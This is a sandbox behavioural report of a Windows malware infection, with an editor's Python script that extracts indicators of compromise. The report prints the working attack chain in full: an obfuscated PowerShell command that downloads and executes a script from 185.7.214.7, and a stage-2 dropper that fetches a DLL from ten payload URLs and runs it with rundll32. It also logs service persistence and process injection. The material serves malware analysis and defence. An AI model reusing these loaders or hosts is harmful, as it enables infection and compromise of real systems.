protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00571000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received (HTTP response headers for GET /PP91.PNG):
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Tue, 18 Jan 2022 01:05:41 GMT
Content-Type: image/png
Content-Length: 1080
Last-Modified: Mon, 17 Jan 2022 19:33:33 GMT
Connection: keep-alive
ETag: "61e5c48d-438"
Accept-Ranges: bytes
Data received (body returned for PP91.PNG: a stage-2 PowerShell script, reflowed here at statement boundaries):
$path = "C:\Users\Public\Documents\ssd.dll";
$url1 = 'http://mecaglobal.com/qxim/TlDTjlxYAdwU/';
$url2 = 'http://2021.posadamision.com/wp-admin/gO7Qvfd1/';
$url3 = 'http://mymicrogreen.mightcode.com/pub/WwQe6kKVIsa/';
$url4 = 'http://mawroyalmedia.com.ng/l1o2x/mAgab05/';
$url5 = 'http://pokawork.com.ng/-/uLYqpe6E8FH2DkM/';
$url6 = 'http://ariesnetwork.co.uk/cgi-bin/QO5VMUFERLpCd/';
$url7 = 'http://clatmagazine.com/p8wl/714/';
$url8 = 'https://animalkingdompro.com/wp-includes/TjXLWDUyhJuvIsPR/';
$url9 = 'http://bitcoin-up.fomentomunivina.cl/assets/w82JxkF70pHiMXtSm/';
$url10 = 'https://cr.almalunatural.com/b/GbQllyWCCy4bJWG2PW/';
$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10".split(",");
foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{} }
Sleep -s 4;
cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;
Data received (remaining rows: non-printable binary response body of the module download; omitted)
Data sent GET /PP91.PNG HTTP/1.1 Host: 185.7.214.7 Connection: Keep-Alive
Data sent GET /qxim/TlDTjlxYAdwU/ HTTP/1.1 Host: mecaglobal.com Connection: Keep-Alive
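The body served for PP91.PNG (Content-Type: image/png, 1080 bytes) is not an image but the stage-2 script: it tries ten URLs in order, writing each response to C:\Users\Public\Documents\ssd.dll and stopping at the first one that yields at least 30000 bytes (a crude check that it received a DLL rather than an error page), waits four seconds, then loads the file with rundll32 under the export name AnyString. The Python below is an editor's example and not part of the ZeroBOX report; it pulls the indicators out of the recorded script text so they can be blocked or hunted without executing anything. It assumes only the shape of this script (a $path assignment, numbered $urlN variables, the Length -ge check and the rundll32 call).

```python
"""IOC extraction from the stage-2 PowerShell script recorded under "Data received"."""
import re
from urllib.parse import urlsplit

# Script body as recorded in the report (served with Content-Type: image/png),
# reflowed at statement boundaries for readability.
STAGE2 = r"""$path = "C:\Users\Public\Documents\ssd.dll";
$url1 = 'http://mecaglobal.com/qxim/TlDTjlxYAdwU/';
$url2 = 'http://2021.posadamision.com/wp-admin/gO7Qvfd1/';
$url3 = 'http://mymicrogreen.mightcode.com/pub/WwQe6kKVIsa/';
$url4 = 'http://mawroyalmedia.com.ng/l1o2x/mAgab05/';
$url5 = 'http://pokawork.com.ng/-/uLYqpe6E8FH2DkM/';
$url6 = 'http://ariesnetwork.co.uk/cgi-bin/QO5VMUFERLpCd/';
$url7 = 'http://clatmagazine.com/p8wl/714/';
$url8 = 'https://animalkingdompro.com/wp-includes/TjXLWDUyhJuvIsPR/';
$url9 = 'http://bitcoin-up.fomentomunivina.cl/assets/w82JxkF70pHiMXtSm/';
$url10 = 'https://cr.almalunatural.com/b/GbQllyWCCy4bJWG2PW/';
$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10".split(",");
foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{} }
Sleep -s 4;
cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;"""

PATH_RE = re.compile(r'\$path\s*=\s*"([^"]+)"')
URL_RE = re.compile(r"\$url(\d+)\s*=\s*'([^']+)'")          # numbered $urlN = '...'
SIZE_RE = re.compile(r"\(Get-Item \$path\)\.Length\s+-ge\s+(\d+)")
SLEEP_RE = re.compile(r"\bSleep\s+-s\s+(\d+)", re.I)
EXEC_RE = re.compile(r"rundll32\.exe\s+'([^']+)',(\w+)", re.I)  # rundll32 '<module>',<export>

def extract(script):
    """Return the drop path, payload URLs in retry order, hosts, size gate and loader call."""
    urls = [u for _, u in sorted((int(n), u) for n, u in URL_RE.findall(script))]
    hosts = []
    for u in urls:
        host = urlsplit(u).hostname
        if host not in hosts:
            hosts.append(host)
    m_exec = EXEC_RE.search(script)
    return {
        "drop_path": PATH_RE.search(script).group(1),
        "payload_urls": urls,
        "hosts": hosts,
        "min_size": int(SIZE_RE.search(script).group(1)),
        "sleep_seconds": int(SLEEP_RE.search(script).group(1)),
        "exec": {"loader": "rundll32.exe", "module": m_exec.group(1),
                 "export": m_exec.group(2)} if m_exec else None,
    }

def ioc_lines(info):
    """Flat indicator list, one tab-separated type/value pair per line."""
    lines = [f"url\t{u}" for u in info["payload_urls"]]
    lines += [f"domain\t{h}" for h in info["hosts"]]
    lines.append(f"file\t{info['drop_path']}")
    if info["exec"]:
        lines.append(f"cmdline\trundll32.exe {info['exec']['module']},{info['exec']['export']}")
    return lines

if __name__ == "__main__":
    print("\n".join(ioc_lines(extract(STAGE2))))
```

The report's traffic shows a single GET to mecaglobal.com (the first URL), consistent with that download passing the 30000-byte gate; the other nine hosts are still worth blocking because the script falls through to them whenever an earlier one fails. The export name AnyString does not need to exist: rundll32 loads the module, which runs its DllMain, before it looks the export up.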
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process rundll32.exe
rule DebuggerCheck__GlobalFlags (no description)
rule DebuggerCheck__QueryInfo (no description)
rule DebuggerHiding__Thread (no description)
rule DebuggerHiding__Active (no description)
rule ThreadControl__Context (no description)
rule SEH__vectored (no description)
rule anti_dbg: Checks if being debugged
rule disable_dep: Bypass DEP
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2256 CREDAT:145409
service_name lblzasgj.kjy service_path C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kgeyspeml\lblzasgj.kjy",iwpn
Time & API Arguments Status Return Repeated

CreateServiceW

service_start_name:
start_type: 2
password:
display_name: lblzasgj.kjy
filepath: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kgeyspeml\lblzasgj.kjy",iwpn
service_name: lblzasgj.kjy
filepath_r: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kgeyspeml\lblzasgj.kjy",iwpn
desired_access: 2
service_handle: 0x005beb80
error_control: 0
service_type: 16
service_manager_handle: 0x005b3e28
1 6024064 0
parent_process iexplore.exe martian_process powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

send

buffer: GET /PP91.PNG HTTP/1.1 Host: 185.7.214.7 Connection: Keep-Alive
socket: 1192
sent: 69
1 69 0

send

buffer: GET /qxim/TlDTjlxYAdwU/ HTTP/1.1 Host: mecaglobal.com Connection: Keep-Alive
socket: 1216
sent: 82
1 82 0
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
file C:\Windows\SysWOW64\Kgeyspeml\lblzasgj.kjy:Zone.Identifier
Process injection Process 2256 resumed a thread in remote process 2404
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000358
suspend_count: 1
process_identifier: 2404
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\Public\Documents\ssd.dll
file C:\Windows\System32\cmd.exe